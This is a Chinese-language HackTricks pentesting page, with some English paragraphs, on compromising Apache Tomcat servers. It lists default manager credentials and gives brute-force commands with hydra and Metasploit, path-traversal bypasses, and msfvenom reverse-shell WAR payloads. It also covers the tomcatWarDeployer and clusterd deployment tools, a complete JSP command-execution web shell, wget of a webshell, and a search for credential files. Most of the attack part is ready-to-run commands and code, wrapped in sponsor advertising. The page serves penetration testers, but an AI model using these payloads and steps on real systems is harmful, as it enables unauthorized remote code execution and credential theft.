Apache Tomcat 9 (9.0.30) - Documentation Index

# Tomcat

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

* 你在一个**网络安全公司**工作吗？你想在HackTricks中看到你的**公司广告**吗？或者你想获得**PEASS的最新版本或下载HackTricks的PDF**吗？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！ * 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family) * 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com) * **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。** * **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享你的黑客技巧**。

发现最重要的漏洞，以便更快地修复它们。Intruder跟踪您的攻击面，运行主动威胁扫描，发现整个技术堆栈中的问题，从API到Web应用程序和云系统。[**立即免费试用**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)。 {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} *** ## 发现 * 它通常运行在**端口8080** * **常见的Tomcat错误：**

## 枚举 ### 版本 ```bash curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat Apache Tomcat 9 (9.0.30) - Documentation Index use auxiliary/scanner/http/tomcat_enum ``` ### 默认凭据 Tomcat中最有趣的路径是_**/manager/html**_，在这个路径下，**你可以上传和部署war文件**（执行代码）。但是这个路径受基本的HTTP身份验证保护，最常见的凭据有： * admin:admin * tomcat:tomcat * admin:\ * admin:s3cr3t * tomcat:s3cr3t * admin:tomcat 你可以使用以下方式测试这些凭据和更多凭据： ```bash msf> use auxiliary/scanner/http/tomcat_mgr_login ``` 另一个有趣的Tomcat路径是`/manager/status`，您可以在此处查看操作系统和Tomcat的版本。当您无法访问`/manager/html`时，这对于查找影响Tomcat版本的漏洞非常有用。 ### 暴力破解 ```bash hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html msf6 auxiliary(scanner/http/tomcat_mgr_login) > set VHOST tomacat-site.internal msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180 msf6 auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts ``` ## 漏洞 ### 密码回溯泄露尝试访问`/auth.jsp`，如果你非常幸运，它**可能会在回溯中泄露密码**。 ### 双重URL编码一个众所周知的漏洞是使用CVE-2007-1860中的mod_jk来访问应用程序管理器，它允许**双重URL编码路径遍历**。为了访问Tomcat的管理Web，请转到：_pathTomcat/%252E%252E/manager/html_ 请注意，为了上传Webshell，您可能需要使用双重URL编码技巧，并发送一个cookie和/或SSRF令牌。\ 为了访问后门，您可能还需要使用双重URL编码技巧。 ### /examples 以下示例脚本随Apache Tomcat v4.x - v7.x一起提供，并可供攻击者获取有关系统的信息。这些脚本也已知容易受到跨站脚本攻击（XSS）注入的攻击（来自[这里](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)）。 * /examples/jsp/num/numguess.jsp * /examples/jsp/dates/date.jsp * /examples/jsp/snp/snoop.jsp * /examples/jsp/error/error.html * /examples/jsp/sessions/carts.html * /examples/jsp/checkbox/check.html * /examples/jsp/colors/colors.html * /examples/jsp/cal/login.html * /examples/jsp/include/include.jsp * /examples/jsp/forward/forward.jsp * /examples/jsp/plugin/plugin.jsp * /examples/jsp/jsptoserv/jsptoservlet.jsp * /examples/jsp/simpletag/foo.jsp * /examples/jsp/mail/sendmail.jsp * /examples/servlet/HelloWorldExample * /examples/servlet/RequestInfoExample * /examples/servlet/RequestHeaderExample * /examples/servlet/RequestParamExample * /examples/servlet/CookieExample * /examples/servlet/JndiServlet * /examples/servlet/SessionExample * /tomcat-docs/appdev/sample/web/hello.jsp ### 路径遍历（..;/）在一些[**Tomcat的易受攻击配置**](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/)中，您可以使用路径`/..;/`访问Tomcat中的受保护目录。因此，例如，您可以通过访问`www.vulnerable.com/lalala/..;/manager/html`来**访问Tomcat管理器**页面。使用此技巧绕过受保护路径的**另一种方法**是访问`http://www.vulnerable.com/;param=value/manager/html` ## RCE 最后，如果您可以访问Tomcat Web应用程序管理器，您可以**上传和部署.war文件（执行代码）**。 ### 限制只有当您拥有**足够的权限**（角色：**admin**，**manager**和**manager-script**）时，您才能部署WAR。这些详细信息通常在`/usr/share/tomcat9/etc/tomcat-users.xml`中定义（版本可能有所不同）（参见[POST](tomcat.md#post)部分）。 ```bash # tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed # deploy under "path" context path curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/monshell" # undeploy curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell" ``` ### Metasploit Metasploit是一款广泛使用的渗透测试工具，用于评估和验证系统的安全性。它提供了一系列功能强大的模块，用于发现、利用和管理安全漏洞。Metasploit可以用于测试Web应用程序、操作系统、网络设备等各种目标。 Metasploit的核心是它的模块化架构。它包含了大量的模块，包括扫描器、漏洞利用工具、负载生成器等。这些模块可以根据需要进行组合和配置，以实现特定的渗透测试目标。 Metasploit还提供了一个强大的命令行界面，使用户可以通过命令行进行各种操作。此外，Metasploit还提供了一个图形用户界面（GUI），使用户可以通过可视化界面进行操作。 Metasploit的使用需要一定的技术知识和经验，因为它涉及到复杂的渗透测试技术和工具。然而，一旦掌握了Metasploit的基本原理和操作方法，它将成为渗透测试工作中的重要利器。 ```bash use exploit/multi/http/tomcat_mgr_upload msf exploit(multi/http/tomcat_mgr_upload) > set rhost msf exploit(multi/http/tomcat_mgr_upload) > set rport msf exploit(multi/http/tomcat_mgr_upload) > set httpusername msf exploit(multi/http/tomcat_mgr_upload) > set httppassword msf exploit(multi/http/tomcat_mgr_upload) > exploit ``` ### MSFVenom反向Shell The MSFVenom tool is a powerful payload generator and encoder that is part of the Metasploit Framework. It allows you to create custom payloads for various exploits, including reverse shells. To generate a reverse shell payload using MSFVenom, you can use the following command: ``` msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war ``` Replace `` with your IP address and `` with the port you want to listen on. This command will generate a Java Server Pages (JSP) payload that establishes a reverse TCP connection to your machine. The `-f war` option specifies the output format as a Web Application Archive (WAR) file, which can be deployed on a Tomcat server. Once you have generated the payload, you can deploy it on a vulnerable Tomcat server. After successful deployment, start a listener on your machine using a tool like Netcat or Metasploit. When the target server executes the payload, it will establish a reverse shell connection back to your machine. Remember to use this technique responsibly and only on systems that you have proper authorization to test. ```bash msfvenom -p java/shell_reverse_tcp LHOST= LPORT= -f war -o revshell.war ``` 然后，**上传`revshell.war`文件并访问它（**_**/revshell/**_**）** ### 使用[tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer)进行绑定和反向shell 在某些情况下，这种方法不起作用（例如旧版本的sun） #### 下载 ```bash git clone https://github.com/mgeeky/tomcatWarDeployer.git ``` #### 反向 shell A reverse shell is a type of shell in which the target machine initiates the connection to the attacker's machine. This allows the attacker to gain remote access to the target machine and execute commands. Reverse shells are commonly used in post-exploitation scenarios to maintain persistent access to a compromised system. To establish a reverse shell, the attacker typically needs to exploit a vulnerability in a network service running on the target machine. Once the vulnerability is exploited, the attacker can inject malicious code that establishes a connection back to their machine. There are various tools and techniques available for creating reverse shells, including using netcat, Python, or Metasploit. The choice of tool depends on the specific requirements of the penetration test and the target environment. It is important to note that the use of reverse shells for unauthorized access to systems is illegal and unethical. Reverse shells should only be used in authorized penetration testing engagements or for educational purposes with proper consent and legal authorization. ```bash ./tomcatWarDeployer.py -U -P -H -p :/manager/html/ ``` #### 绑定 shell A bind shell is a type of shell that allows an attacker to gain remote access to a compromised system. It works by binding a shell to a specific port on the target system, allowing the attacker to connect to that port and gain control over the system. To create a bind shell, the attacker needs to find a vulnerable service running on the target system that allows remote connections. One common target is the Apache Tomcat web server, which is often used to host Java-based web applications. Once the attacker has identified a vulnerable service, they can exploit it to execute arbitrary commands on the target system. This can be done by injecting malicious code into the service, such as a web application or a configuration file. Once the malicious code is executed, it opens a network socket on a specific port and waits for a connection from the attacker. When the attacker connects to the port, the bind shell is established, and the attacker gains remote access to the system. Bind shells can be used for various purposes, such as stealing sensitive information, launching further attacks, or maintaining persistent access to the compromised system. To protect against bind shell attacks, it is important to keep all software and services up to date with the latest security patches. Additionally, network monitoring and intrusion detection systems can help detect and prevent unauthorized access attempts. ```bash ./tomcatWarDeployer.py -U -P -p :/manager/html/ ``` ### 使用[Culsterd](https://github.com/hatRiot/clusterd) ```bash clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows ``` ### 手动方法 - Web shell 创建名为 **index.jsp** 的文件，并使用以下[内容](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp)： ```java <%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd,null,null); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s+"
"; } } catch(IOException e) { e.printStackTrace(); } } %>

<%=output %>

``` ```bash mkdir webshell cp index.jsp webshell cd webshell jar -cvf ../webshell.war * webshell.war is created # Upload it ``` 您还可以安装这个（允许上传、下载和执行命令）：[http://vonloesch.de/filebrowser.html](http://vonloesch.de/filebrowser.html) ### 手动方法2 获取一个JSP Web Shell，比如[这个](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp)，并创建一个WAR文件： ```bash wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp zip -r backup.war cmd.jsp # When this file is uploaded to the manager GUI, the /backup application will be added to the table. # Go to: http://tomcat-site.local:8180/backup/cmd.jsp ``` ## POST Tomcat凭据文件的名称是 _tomcat-users.xml_ ```bash find / -name tomcat-users.xml 2>/dev/null ``` 获取Tomcat凭据的其他方法： ```bash msf> use post/multi/gather/tomcat_gather msf> use post/windows/gather/enum_tomcat ``` ## 其他Tomcat扫描工具 * [https://github.com/p0dalirius/ApacheTomcatScanner](https://github.com/p0dalirius/ApacheTomcatScanner)

找到最重要的漏洞，以便您能更快地修复它们。Intruder跟踪您的攻击面，运行主动威胁扫描，发现整个技术栈中的问题，从API到Web应用和云系统。[**立即免费试用**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)。 {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}

☁️ HackTricks云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

* 您在**网络安全公司**工作吗？您想在HackTricks中看到您的**公司广告**吗？或者您想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗？请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！ * 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品- [**The PEASS Family**](https://opensea.io/collection/the-peass-family) * 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com) * **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)，或在**Twitter**上**关注**我[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。** * **通过向[hacktricks repo](https://github.com/carlospolop/hacktricks)和[hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享您的黑客技巧**。